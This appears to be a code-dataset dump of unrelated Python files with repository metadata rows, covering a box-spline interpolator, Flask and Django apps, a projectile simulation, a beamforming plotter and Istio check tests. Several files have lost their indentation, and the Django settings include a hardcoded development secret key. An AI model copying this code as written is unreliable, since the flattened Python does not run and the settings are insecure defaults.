# Holder for knowing if we've improved the box
improved = False
# At most 2 on non-gridded data
for pt in to_use:
print()
print("Trying to use dimension %i, point %i"%(d,pt[1]))
# Get this neighboring point
neighbor_pt = control_points[pt[1]]
# Shorten the existing box on dimension d to stop at this neighbor
if neighbor_pt[d] < center[d]:
print("Shrinking the lower width along",d)
old_width = (box.low_width, box.low_width[d])
box.low_width[d] = center[d] - neighbor_pt[d]
old_neighbor = [n for n in neighbors if (
control_points[n[1],d] <= neighbor_pt[d])]
else:
print("Shrinking the upper width along",d)
old_width = (box.upp_width, box.upp_width[d])
box.upp_width[d] = neighbor_pt[d] - center[d]
old_neighbor = [n for n in neighbors if (
control_points[n[1],d] >= neighbor_pt[d])]
# Make sure that the point that is being
# reused isn't included in the neighbors to remove
if pt in old_neighbor: old_neighbor.remove(pt)
# Try and grow the box in both direction of the
# min side length (we can now squeeze through)
for growing in [box.low_width, box.upp_width]:
old_min_side = growing[min_side]
growing[min_side] = float('inf')
new_neighbor = None
# Identify the new boundary for the box
for c in candidates:
if box.contains(control_points[c]):
# If there isn't currently a new
# neighbor, or this point is
# closer than the current neighbor
if ((new_neighbor == None) or
( abs(center[min_side] - control_points[c][min_side])
<
abs(center[min_side] - control_points[new_neighbor[1]][min_side])
)):
growing[min_side] = abs(center[min_side] - control_points[c][min_side])
new_neighbor = [min_side,c]
# Adjust the side lengths, ignoring infinities
low_width = np.where(box.low_width < float('inf'),
box.low_width, box.center - min_bounds)
upp_width = np.where(box.upp_width < float('inf'),
box.upp_width, max_bounds - box.center)
side_lengths = low_width + upp_width
print("low_width: ",low_width)
print("upp_width: ",upp_width)
print("side_lengths: ",side_lengths)
print()
# Identify the new minimum dimension of the box
if np.min(side_lengths) > min_len:
print("Improved!")
print("new_neighbor: ",new_neighbor)
print(box)
# If we've increased the minimum side length
improved = True
# Formally adjust the modified neighbor boundary
pt[0] = d
# Add the new neighbor that was encountered
if new_neighbor:
print("Found new neighbor: ", new_neighbor)
neighbors.append(new_neighbor)
# Remove the now obselete neighbors on this dimension
for to_remove in old_neighbor:
print("Removing neighbor: ", to_remove)
neighbors.remove(to_remove)
old_neighbor = []
else:
print("Not improved.")
# Otherwise, revert changes
old_width[0][d] = old_width[1]
growing[min_side] = old_min_side
# Stop cycling boundary checks when successfully improved
if improved: break
print()
# Improvement found, break out of this iteration
if improved: break
else:
# If we've checked all dimensions and no
# improvement could be found, then we are done!
break
# We have now found the box with the largest minimum side length
self.boxes.append(box)
# Store the value at the center of a box (same for all boxes)
self.box_center_value = self.boxes[0](self.boxes[0].center)
# Calculate the lipschitz constant for this data
self.calculate_lipschitz()
# Stores the lipschitz constant of this data set in self.lipschitz
def calculate_lipschitz(self):
self.lipschitz = 0
# Calculate the lipschitz constant of the data
for (b,v) in zip(self.boxes,self.values):
for (other_b,other_v) in zip(self.boxes,self.values):
if (v == other_v): continue
dist = np.sqrt(np.sum((b.center - other_b.center)**2))
self.lipschitz = max(self.lipschitz, abs(v - other_v) / dist)
return self.lipschitz
# Calculate and return the plus/minus error at a given x-value
def error(self, x):
# Get the surface value
surf_val = self(x)
# Initialize holder for plus and minus error
error = [float('inf'),float('inf')]
for (b,v) in zip(self.boxes, self.values):
dist = np.sqrt(np.sum( (b.center - x)**2 ))
error[0] = min(error[0], abs(v - dist*self.lipschitz - surf_val))
error[1] = min(error[1], abs(v + dist*self.lipschitz - surf_val))
# Remove all infinities from error
while float('inf') in error:
error[error.index(float('inf'))] = 0
# Return the plus and minus error at a given data point
return error
# Evaluate all of the box splines and return the final function
# value at the requested point.
def __call__(self, x):
# # If we're using a linear function, calculate lagrange-style interpolation value
# if (self.box_func == linear and self.width_scalar == 1.0):
# value = 0
# for (b,v) in zip(self.boxes, self.values):
# box_val = b(x)
# value += box_val * v / self.box_center_value
# return value
# Otherwise, use the NURBS approach to smoothing
numerator = denominator = 0
# Calculate the numerator and denominator
for (b,v) in zip(self.boxes, self.values):
box_val = b(x)
numerator += box_val * v
denominator += box_val
# Adjust for points outside of the region
if denominator == 0:
print("WARNING: Out of the range of all boxes.")
return None
# Return the evaluation of all box splines for this point
return numerator / denominator
# =======================
# Plotting Code
# =======================
# Produces a list of the points that define the corners of the given
# box, when the width is infinity, uses min_max
def box_corners(box, low_upp):
points = []
bits = [0] * len(box.center)
for d in range(2*len(bits)):
bit_index = d % len(bits)
bits[bit_index] = (bits[bit_index] + 1) % 2
# Scale infinite sides to be just wide of the boundary points
low_width = np.where(abs(box.low_width) != float('inf'), box.low_width, low_upp[0])
upp_width = np.where(abs(box.upp_width) != float('inf'), box.upp_width, low_upp[1])
# Add the next corner
points += [[ box.center[i] + (-low_width[i] if bits[i] else upp_width[i])
for i in range(len(bits)) ]]
return points
# Draw a box in a 2D plotly plot
def draw_2D_box(plot, box, min_max):
# Generate the absolute lower and upper plotting bounds
low_upp = [[box.center[i] - min_max[0][i],
min_max[1][i] - box.center[i]] for i in range(len(box.center))]
low_upp = np.array(low_upp).T
# Get the boundary points of the box
corners = box_corners(box, low_upp)
corners.append(corners[0])
corners = np.array(corners)
# Add the box to the plot
opacity = 0.7
plot.color_num += 1
color = plot.color(plot.color_num, alpha=opacity)
center = list(box.center)
plot.add("%s boundary"%(box.id), *list(zip(*corners)),
mode='lines', color=color, opacity=opacity)
return color
# Draw the boundary boxes for a given mesh
def draw_boxes_2D(plot, mesh):
min_max_x = (min(b.center[0] for b in mesh.boxes), max(b.center[0] for b in mesh.boxes))
min_max_y = (min(b.center[1] for b in mesh.boxes), max(b.center[1] for b in mesh.boxes))
# Add an extra buffer to the edges
extra = (0.1 * (min_max_x[1] - min_max_x[0]),
0.1 * (min_max_y[1] - min_max_y[0]))
min_max_x = (min_max_x[0] - extra[0], min_max_x[1] + extra[0])
min_max_y = (min_max_y[0] - extra[1], min_max_y[1] + extra[1])
min_max = list(zip(min_max_x, min_max_y))
colors = []
# First, draw the borders of all of the boxes
for box in mesh.boxes:
colors.append( draw_2D_box(plot, box, min_max) )
# Draw the centers second in order to make them on 'top' of the borders
for box,color in zip(mesh.boxes, colors):
plot.add("%s center"%(box.id), *[[v] for v in box.center],
show_in_legend=False, marker_size=5, symbol='square',
color=color)
# ====================================================
# Testing the code for generating box meshes
# ====================================================
if __name__ == "__main__":
use_max_box = True
random_points = True
normalize_points = False
num_points = 3
func = linear
size = 1.0
plot_range = [0.01,0.99] #[-0.2, 1.2]
plot_points = 1000
# fun = lambda x: (x[0]-num_points/3)*(x[1]-num_points/2)**2
fun = lambda x: np.cos(x[0]) * np.sin(x[1])
# Generate testing points in a grid pattern
points = np.meshgrid(range(num_points), range(num_points))
points = np.array([points[0].flatten(), points[1].flatten()]).T
if random_points:
# Generate testing points randomly spaced
points = np.random.random(size=(num_points**2,2)) * num_points
# Breaking Max-Box-Side-Length continuity
points = np.array([
[1,0],
[3,2],
[4,1],
[0,5],
[3,6],
[5,7]
])
print(points)
# Calculate the associated response values
values = np.array([[fun(pt) for pt in points]]).T
points = np.concatenate((points, values), axis=1)
points = points[points[:,1].argsort()]
points = points[points[:,0].argsort()]
# print(points)
if normalize_points:
# Normalize the points
points[:,2] -= min(points[:,-1])
max_val = max(max(r[:-1]) for r in points)
points[:,:2] /= max_val
points[:,2] += 1.3
else:
min_val = np.min(points[:,:2])
max_val = np.max(points[:,:2])
plot_range = [ plot_range[0] * (max_val - min_val) + min_val,
(plot_range[1]-1) * (max_val - min_val) + max_val]
print("Constructing mesh...")
surf = BoxMesh(func, size)
surf.add_points(points, use_max_box)
print("Creating visualization...")
surf_p = Plot()
print(" adding control points...")
surf_p.add("Control Points", *(points.T))
print(" adding mesh surface...")
surf_p.add_func("Surface", surf, plot_range, plot_range,
use_gradient=True, plot_points=plot_points)
# surf_p.plot()
print(" creating box plot...")
boxes_p = Plot()
draw_boxes_2D(boxes_p, surf)
print(" making HTML...")
multiplot([[boxes_p,surf_p]])
# print("Constructing second mesh...")
# surf2 = BoxMesh(func, size)
# surf2.add_points(points, not use_max_box)
# print("Drawing plots...")
# boxes_p2 = Plot()
# draw_boxes_2D(boxes_p2, surf2)
# surf_p2 = Plot()
# surf_p2.add("Control Points", *(points.T))
# surf_p2.add_func("Surface", surf2, plot_range, plot_range, use_gradient=True)
# multiplot([[boxes_p,surf_p],
# [boxes_p2,surf_p2]])
| [
"[email protected]"
] | |
64f33d189625ea147141f4287452b920cda333fb | 19b2affa8ed62c2a1e6299ac6de797e602894b16 | /backend/src/server/api/stats/at_work.py | 0fe49ab0fce6071c837017169c89df887eb97621 | [] | no_license | skapin/power-elements | 8b0c24869588abe05b46d998e82090bd7e39b3a2 | 76b1547eeeea521ef655dda134a47f2469990394 | refs/heads/master | 2023-01-02T19:26:38.072353 | 2020-05-22T15:54:50 | 2020-05-22T15:54:50 | 265,940,649 | 0 | 0 | null | 2020-10-27T22:35:41 | 2020-05-21T20:03:02 | Python | UTF-8 | Python | false | false | 1,137 | py | import logging
import json
from flask import request, jsonify, abort, Blueprint
from flask_restful import Resource, reqparse
from config.settings import SETTINGS
from common.utils.security import generate_user_token, extract_payload
from db.models import Question, Account, Response
from common.db.base import Database
from flask_restful_swagger import swagger
from sqlalchemy import desc, func
LOG = logging.getLogger(__name__)
class AtWork(Resource):
@swagger.operation(
notes='Get Stats from account',
responseMessages=[
{
"code": 200,
"message": "Everything went right"
},
{
"code": 405,
"message": "file not found"
}
]
)
def get(self):
with Database(auto_commit=True) as db:
at_work_account = db.query(func.count(Account.uniqid)).filter_by(at_work=True).first()
at_home_account = db.query(func.count(Account.uniqid)).filter_by(at_work=False).first()
return jsonify({'at_work_account': at_work_account[0], 'at_home_account': at_home_account[0]})
| [
"[email protected]"
] | |
49d8a0cb2a3ec05cdb81a281746a484cb2616dcb | b4c0c347cca4856bbdf82c06142ae9cd18e02746 | /api/models.py | 6ef37b3c1375701f4d646f1685e3a746a8782ab0 | [
"MIT"
] | permissive | AanandhiVB/bank-admin-backend | dfb9793eedd6a447d25ad15f3417f4933806a512 | cce02c37e06dc2cd72d160f4817ec7658714831e | refs/heads/main | 2023-05-05T15:19:35.241460 | 2021-05-23T18:49:22 | 2021-05-23T18:49:22 | 370,040,798 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 706 | py | from django.db import models
# Create your models here.
class Bank(models.Model):
name = models.CharField(max_length=100, blank=False, null=False)
class Branch(models.Model):
bank = models.ForeignKey(Bank,on_delete=models.CASCADE)
ifsc = models.CharField(max_length=100, blank=False, null=False)
branch = models.CharField(max_length=100, blank=False, null=False)
address = models.CharField(max_length=200, blank=False, null=False)
city = models.CharField(max_length=100, blank=False, null=False)
district = models.CharField(max_length=100, blank=False, null=False)
state = models.CharField(max_length=100, blank=False, null=False)
| [
"[email protected]"
] | |
241a1492ddab027c0632271bea37fbd696a507f5 | 344caf79f5640b2b6d86f5c70a92b0358e3bfc15 | /dynamics/gravity/projectile.py | 3eceac1460803d0e6318a8e339460c43d4a8b0ba | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | brettrhenderson/PySims | 8a70712864a38b3090a14ef8e45751f719d656c1 | 07fe37d1a61ef3b8f3d10ef9f393b5144acc1b96 | refs/heads/master | 2022-11-16T13:33:20.227467 | 2020-06-29T01:06:39 | 2020-06-29T01:06:39 | 275,475,316 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,203 | py | import numpy as np
import matplotlib.pyplot as plt
from matplotlib.animation import FuncAnimation
# gravitational constant 6.67408 × 10-11 m3 kg-1 s-2
G = 6.67408E-11
class Projectile:
def __init__(self, h0, v0, rg=6.731e6, g=9.8, dt=1.0, nmax=300000):
self.dt = dt
self.h0 = h0
self.g = g
self.rg = rg
self.nmax = nmax
self.xg = np.array([0, -rg])
self.x = [np.array([0, h0])]
self.v = [v0]
self.a = [self.accel_(self.x[0])]
def accel_(self, r):
r_vec = self.xg - r
r_mag = np.linalg.norm(r_vec)
return self.g * r_vec / r_mag
def step_(self):
self.x.append(self.x[-1] + self.v[-1] * self.dt + 0.5 * self.a[-1] * (self.dt**2))
new_acc = self.accel_(self.x[-1])
self.v.append(self.v[-1] + 0.5 * (self.a[-1] + new_acc) * self.dt)
self.a.append(new_acc)
def compute_trajectory(self):
while (np.linalg.norm(self.x[-1] - self.xg) > self.rg) and (len(self.x) < self.nmax):
#while (self.x[-1][1] > 0) and (len(self.x) < self.nmax):
self.step_()
def animate(self, adjust_axes=False, interval=50, figsize=(10,8)):
x = np.array(self.x)
# Plot Stuff
fig = plt.figure(figsize=figsize)
ax = fig.add_subplot(111, autoscale_on=False)
path, = ax.plot([], [], 'b-', markersize=4, alpha=0.4)
proj, = ax.plot([], [], 'r-', markersize=4)
# ground = ax.hlines(0, self.x[0] - 10, self.x[-1] + 10)
ground, = ax.plot(x[:, 0], np.sqrt(self.rg**2 - x[:, 0]**2) - self.rg, 'k-')
textx = ax.text(0.8, 0.9, f'x = {self.x[0][0]:.2f}m', horizontalalignment='center',
verticalalignment='center', transform=ax.transAxes)
texty = ax.text(0.8, 0.8, f'y = {self.x[0][1]:.2f}m', horizontalalignment='center',
verticalalignment='center', transform=ax.transAxes)
textg = ax.text(0.8, 0.7, f'h = {np.linalg.norm(self.x[0] - self.xg) - self.rg:.2f}m', horizontalalignment='center',
verticalalignment='center', transform=ax.transAxes)
textv = ax.text(0.8, 0.6, f'v = {np.linalg.norm(self.v[0]):.1f}m/s', horizontalalignment='center',
verticalalignment='center', transform=ax.transAxes)
ln = [proj, path, ground, textv, textx, texty, textg]
def init_plot():
if adjust_axes:
ax.set_xlim(self.x[0][0] - 2, self.x[0][0] + 10)
ax.set_ylim(-self.h0 * 2, self.x[0][1] + 10)
else:
ax.set_xlim(self.x[0][0] - 2, self.x[-1][0] + 10)
ax.set_ylim(-self.h0 * 2, self.x[int(len(self.x)/2)][1] + 10)
plt.axis('off')
return ln
def update_plot(i):
# get current vector of jav
javv = 2.3 * (x[i] - x[i-1]) / np.linalg.norm(x[i] - x[i-1])
jav = np.array([x[i] - javv/2, x[i] + javv/2])
# proj.set_data(x[i, 0], x[i, 1])
proj.set_data(jav[:, 0], jav[:, 1])
path.set_data(x[:i+1, 0], x[:i+1, 1])
# adjust text
textx.set_text(f'x = {x[i, 0]:.2f}m')
texty.set_text(f'y = {x[i, 1]:.2f}m')
textv.set_text(f'v = {np.linalg.norm(self.v[i]):.1f}m/s')
textg.set_text(f'h = {np.linalg.norm(self.x[i] - self.xg) - self.rg:.2f}m')
if adjust_axes:
# adjust axes if needed
if self.x[i][0] > ax.get_xlim()[1] - 10:
ax.set_xlim([ax.get_xlim()[0], x[i, 0] + 10])
if self.x[i][1] > ax.get_ylim()[1] - 10:
ax.set_ylim([ax.get_ylim()[0], x[i, 1] + 10])
return ln
return FuncAnimation(fig, update_plot, init_func=init_plot, frames=len(self.x), interval=interval, blit=True, repeat=False)
if __name__ == "__main__":
h0 = 2
v0 = np.array([26, 15])
ball = Projectile(h0, v0, rg=6.731e6, g=9.8, dt=0.01, nmax=30000)
ball.compute_trajectory()
ani = ball.animate(adjust_axes=False, interval=10, figsize=(15, 6))
# ani.save('projectile.mp4', extra_args=['-vcodec', 'libx264'])
plt.show()
| [
"[email protected]"
] | |
b3f61b006eab4de683eabd97c232a3538ac61f90 | eb40d59aaceed26160aae48f6abc9dca0ab4bd1e | /project3/settings.py | 4008cf7547ce3130b5ed4f000c533160287de206 | [] | no_license | scarlos723/mail | 8936c92fe6ebb1f882334f660c88683b46a879ba | e00521240592ac13ff52dbfd6373e69011d8a36c | refs/heads/master | 2023-01-01T06:56:47.189807 | 2020-10-25T07:38:44 | 2020-10-25T07:38:44 | 305,962,361 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,253 | py | """
Django settings for project3 project.
Generated by 'django-admin startproject' using Django 3.0.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '05$4$3aew(8ywondz$g!k4m779pbvn9)euj0zp7-ae*x@4pxr+'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'mail',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'project3.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'project3.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
AUTH_USER_MODEL = 'mail.User'
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
# PROJECT_ROOT = os.path.normpath(os.path.dirname(__file__))
# STATIC_ROOT = os.path.join(PROJECT_ROOT, 'static')
STATIC_URL = '/static/'
| [
"[email protected]"
] | |
fe6b4e9a2fa21b14b8a757cf8fcbf9e6df72eef4 | 220a1bd2b0d26475dfa357eef7f4955d13f5560f | /hwk_11_ve/bin/pip | 9a6395f55793276a645ebfa09e0e7550d776e4bf | [] | no_license | togaryo/SI507_F18_HW11_Flask | 5cefc8be0b9a1b38e5d28d446dd9d8f0ffc0fc2d | 462ffb87b440767922c71a8d805e9a97efb6f615 | refs/heads/master | 2020-04-09T05:58:24.015258 | 2018-12-03T03:28:19 | 2018-12-03T03:28:19 | 160,089,314 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 261 | #!/Users/ryo6122/Desktop/SI507/week12/hw11/hwk_11_ve/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from pip._internal import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"[email protected]"
] | ||
0dea56dcecce21edb733840c1fb5b8adbf4b9c65 | a43cb9427265e8d7f2202bf88578401beb90e47a | /url_reducer/views.py | f26495eee7e56dd543b9890abfd1cd892832fbfe | [] | no_license | danielngd/url_reduce | 7bf8896f0dcdc62acf7ec5a5df9fe68019126b3e | 8626344c19ea69b7e4b21517edb83a56ffcd90e5 | refs/heads/main | 2023-05-15T07:50:38.757052 | 2021-06-07T15:27:55 | 2021-06-07T15:27:55 | 369,886,757 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,096 | py | from django.db.models.fields import SlugField
from django.shortcuts import redirect, render
from django.http import HttpResponse
from django.db.models.functions import TruncDate
from django.db.models import Count
import string
import random
# Create your views here.
from url_reducer.models import UrlRedirect, Urllog
def home(requisicao):
return render(requisicao, 'url_reducer/index.html')
def criar_slug(N:int) -> str:
return ''.join(random.SystemRandom().choice(
string.ascii_letters + \
string.digits) for _ in range(N)
)
def processar(requisicao):
url = requisicao.POST.get('url')
url_redirect = UrlRedirect.objects.filter(destino=url)
if not url_redirect:
url_redirect = UrlRedirect.objects.create(
destino = url,
slug = criar_slug(6)
)
else:
url_redirect = url_redirect[0]
return redirect('/relatorios/{slug}'.format(slug=url_redirect.slug))
def relatorios(requisicao, slug):
url_redirect = UrlRedirect.objects.get(slug=slug)
url_reduzida = requisicao.build_absolute_uri(f'/{slug}')
redirecionamentos_por_data = list(
UrlRedirect.objects.filter(
slug = slug
).annotate(
data = TruncDate('logs__criado_em')
).annotate(
cliques = Count('data')
).order_by('data')
)
contexto = {
'reduce': url_redirect,
'url_reduzida': url_reduzida,
'redirecionamentos_por_data': redirecionamentos_por_data,
'total_cliques': sum(r.cliques for r in redirecionamentos_por_data)
}
return render(requisicao, 'url_reducer/relatorio.html', contexto)
def redirecionar(requisicao, slug):
url_redirect = UrlRedirect.objects.get(slug=slug)
Urllog.objects.create(
origem = requisicao.META.get('HTTP_REFERER'),
user_agent = requisicao.META.get('HTTP_USER_AGENT'),
host = requisicao.META.get('HTTP_HOST'),
ip = requisicao.META.get('REMOTE_ADDR'),
url_redirect = url_redirect
)
return redirect(url_redirect.destino)
| [
"[email protected]"
] | |
de83d9b23e9cd7655d6124d3683b4051a0b582ed | 2ec662ebc944b9fcc4a1b10fb61bb091b0d45c57 | /Code_Pattern/beamforming_pattern_gen_circ_array.py | 91f6fadf0dbe1f3d0e578c59edeb5daafdf4bac4 | [
"MIT"
] | permissive | tomhirsh/acoustic_beamforming | 99e98b13b6f87dede2498cb2d6c160607d307808 | f0f4222c6328566f2436313a4d430c4ad6080d59 | refs/heads/main | 2023-07-11T05:12:22.387690 | 2021-08-15T11:42:49 | 2021-08-15T11:42:49 | 395,537,242 | 0 | 0 | MIT | 2021-08-13T06:01:26 | 2021-08-13T06:01:26 | null | UTF-8 | Python | false | false | 4,912 | py | """This module plots and outputs beamforming pattern
of a circular phased array.
Author: Tom Hirshberg
"""
import numpy as np
import matplotlib.pyplot as plt
import argparse
from beamforming_pattern_gen import *
# Get amplitude law
def get_amplitude_law(N, law = 'constant', minAmp = 1):
"""Computes an amplitude law given N (number of elements),
law (type of law) and minAmp (minimum amplitude).
"""
amp_law = []
for n in range(N):
if law == 'constant':
amp_law.append(1)
elif law == 'linear':
beta = 0 if N%2!=0 else (1-minAmp)/(N-1)
amp_law.append((minAmp-1-beta) * 2/(N-1) * abs(n - (N-1) / 2) + 1 + beta)
elif law == 'log_linear':
beta = 0 if N%2!=0 else (1-lineartodB(minAmp))/(N-1)
amp_law.append(dBtoLinear((lineartodB(minAmp)-beta) * 2/(N-1) * abs(n-(N-1)/2) + beta))
elif law == 'poly2':
beta = 0 if N%2!=0 else (1-minAmp)/(N-1)
amp_law.append((minAmp-1-beta) * (2/(N-1))**2 * (n-(N-1)/2)**2 + 1 + beta**2)
elif law == 'poly3':
beta = 0 if N%2!=0 else (1-minAmp)/(N-1)
amp_law.append((minAmp-1-beta) * (2/(N-1))**3 * abs(n-(N-1)/2)**3 + 1 + beta**3)
return np.array(amp_law)
# Get phase law
def get_circular_phase_law(num_sources, alpha, R, wavelength, phi):
phase_law = []
for n in range(num_sources):
phase_law.append(2 * np.pi / wavelength * (2 * R * np.sin(n * alpha)) * np.sin(phi + n * alpha))
return phase_law
def get_circular_pattern(num_sources, R, wavelength, phi, logScale=True, ccw=True):
alpha = 2 * np.pi / num_sources
amp_law = np.ones(num_sources)
phase_law = get_circular_phase_law(num_sources, alpha, R, wavelength, phi)
theta = np.arange(0, 2*np.pi, np.radians(0.1))
mag = []
for theta_i in theta:
im = re = 0
# Phase shift due to off-boresight angle
# Compute sum of effects of elements
for n in range(num_sources):
if ccw:
factor = n * alpha
else:
factor = -n * alpha
psi = np.sin(theta_i + n * alpha )
coeff = 2 * np.pi / wavelength * (2 * R * np.sin(n * alpha))
# using constant amplitude law for simplicity #TODO: will be optimized in pyRoomAcoustics
im += np.sin(coeff * (psi + np.sin(phi + factor)))
re += np.cos(coeff * (psi + np.sin(phi + factor)))
magnitude = np.sqrt(re**2 + im**2)/num_sources
if logScale:
magnitude = 20*np.log10(magnitude)
mag.append(magnitude)
return theta, mag, amp_law, phase_law
def plot_pattern(theta, mag, amp_law, phase_law, polar=False, output_file=None):
"""Plots a magnitude pattern, amplitude law and phase law.
Optionnally, it can export the pattern to output_file.
"""
# Default size & dpi
plt.figure(figsize=(10,4),dpi=100)
# Plot pattern
if polar:
ax = plt.subplot(131, polar=True)
ax.plot(theta, mag)
ax.set_theta_zero_location("N")
ax.set_thetalim(0, 2*np.pi)
else:
ax = plt.subplot(131)
ax.plot(theta,mag)
ax.grid(True)
ax.set_xlim([0, 2*np.pi])
ax.set_xlabel('radinas')
plt.ylim(top=0)
plt.title("Antenna pattern - circular array")
# Plot amplitude law
ax = plt.subplot(132)
ax.plot(range(len(amp_law)), amp_law, marker='o')
ax.set_ylim([0,1])
plt.title("Amplitude law")
print("Amplitude law:")
print(amp_law)
# Plot phase law
ax = plt.subplot(133)
plt.title("Phase law")
ax.plot(range(len(phase_law)),np.rad2deg(phase_law), marker='o')
print("Phase law:")
print(phase_law)
# Show and save plot
if output_file is not None:
plt.savefig(output_file + '.png')
np.savetxt(output_file + '.txt', np.transpose([theta,mag]),
delimiter='\t', header="Angle [deg]\tMagnitude [dB]")
plt.show()
def main(args):
# Parameters
N = args.number_elements # Elements
c = args.wave_celerity #m/s
f = args.frequency #Hz
phi = np.radians(args.steering_angle) #deg
polar = args.polar #True=polar patter, False=cartesian pattern
logScale = args.log_scale #True=output in dB, False=linear output
output_file = 'pattern_' + str(N) if args.save_output else None
wavelength = c/f #m
theta, mag, amp_law, phase_law = get_circular_pattern(num_sources=N, R=0.1, wavelength=wavelength, phi=phi, logScale=logScale)
plot_pattern(theta, mag, amp_law,phase_law,polar,output_file=output_file)
if __name__ == '__main__':
args = get_args()
main(args)
| [
"[email protected]"
] | |
8f35b00ec2863b4bc1ed7fe3a963aa23f295757d | b57b0a14df5c6841f04cccb7b02ad04afbca18f8 | /istio/tests/test_istio_1_5.py | 3b34e35c23c2b215618191c3b6ee30ea493de837 | [
"AFL-3.0",
"BSD-3-Clause-Modification",
"LGPL-3.0-only",
"Unlicense",
"LGPL-2.1-only",
"BSD-3-Clause",
"Apache-2.0",
"BSD-2-Clause"
] | permissive | zeroc0d3/integrations-core | d9c99803c049668b7f9f9c796d338e343d3d46ee | 634d567f3c38d32aabb3f4c16b50bcfa8a4ae0fb | refs/heads/master | 2021-09-28T18:37:00.650406 | 2021-09-13T11:59:45 | 2021-09-13T11:59:45 | 199,758,958 | 0 | 0 | BSD-3-Clause | 2019-07-31T02:01:25 | 2019-07-31T02:01:24 | null | UTF-8 | Python | false | false | 3,149 | py | # (C) Datadog, Inc. 2020-present
# All rights reserved
# Licensed under Simplified BSD License (see LICENSE)
import requests_mock
from datadog_checks.dev.utils import get_metadata_metrics
from datadog_checks.istio import Istio
from . import common
from .utils import _assert_tags_excluded, get_response
def test_legacy_istiod(aggregator):
"""
Test the istiod deployment endpoint for v1.5+ check
"""
check = Istio('istio', {}, [common.MOCK_LEGACY_ISTIOD_INSTANCE])
with requests_mock.Mocker() as metric_request:
metric_request.get('http://localhost:8080/metrics', text=get_response('1.5', 'istiod.txt'))
check.check(common.MOCK_LEGACY_ISTIOD_INSTANCE)
for metric in common.ISTIOD_METRICS:
aggregator.assert_metric(metric)
aggregator.assert_metrics_using_metadata(get_metadata_metrics(), check_submission_type=True)
aggregator.assert_all_metrics_covered()
def test_legacy_proxy_mesh(aggregator):
"""
Test proxy mesh check
"""
check = Istio(common.CHECK_NAME, {}, [common.MOCK_LEGACY_MESH_INSTANCE])
with requests_mock.Mocker() as metric_request:
metric_request.get('http://localhost:15090/metrics', text=get_response('1.5', 'istio-proxy.txt'))
check.check(common.MOCK_LEGACY_MESH_INSTANCE)
for metric in common.LEGACY_MESH_METRICS + common.MESH_MERICS_1_5:
aggregator.assert_metric(metric)
_assert_tags_excluded(aggregator, [])
aggregator.assert_metrics_using_metadata(get_metadata_metrics(), check_submission_type=True)
aggregator.assert_all_metrics_covered()
def test_istio_proxy_mesh_exclude(aggregator):
"""
Test proxy mesh check
"""
exclude_tags = ['destination_app', 'destination_principal']
instance = common.MOCK_LEGACY_MESH_INSTANCE
instance['exclude_labels'] = exclude_tags
check = Istio(common.CHECK_NAME, {}, [instance])
with requests_mock.Mocker() as metric_request:
metric_request.get('http://localhost:15090/metrics', text=get_response('1.5', 'istio-proxy.txt'))
check.check(instance)
for metric in common.LEGACY_MESH_METRICS + common.MESH_MERICS_1_5:
aggregator.assert_metric(metric)
_assert_tags_excluded(aggregator, exclude_tags)
aggregator.assert_metrics_using_metadata(get_metadata_metrics(), check_submission_type=True)
aggregator.assert_all_metrics_covered()
def test_legacy_version_metadata(datadog_agent):
check = Istio(common.CHECK_NAME, {}, [common.MOCK_LEGACY_ISTIOD_INSTANCE])
check.check_id = 'test:123'
with requests_mock.Mocker() as metric_request:
metric_request.get('http://localhost:8080/metrics', text=get_response('1.5', 'istiod.txt'))
check.check(common.MOCK_LEGACY_ISTIOD_INSTANCE)
# Use version mocked from istiod 1.5 fixture
MOCK_VERSION = '1.5.0'
major, minor, patch = MOCK_VERSION.split('.')
version_metadata = {
'version.scheme': 'semver',
'version.major': major,
'version.minor': minor,
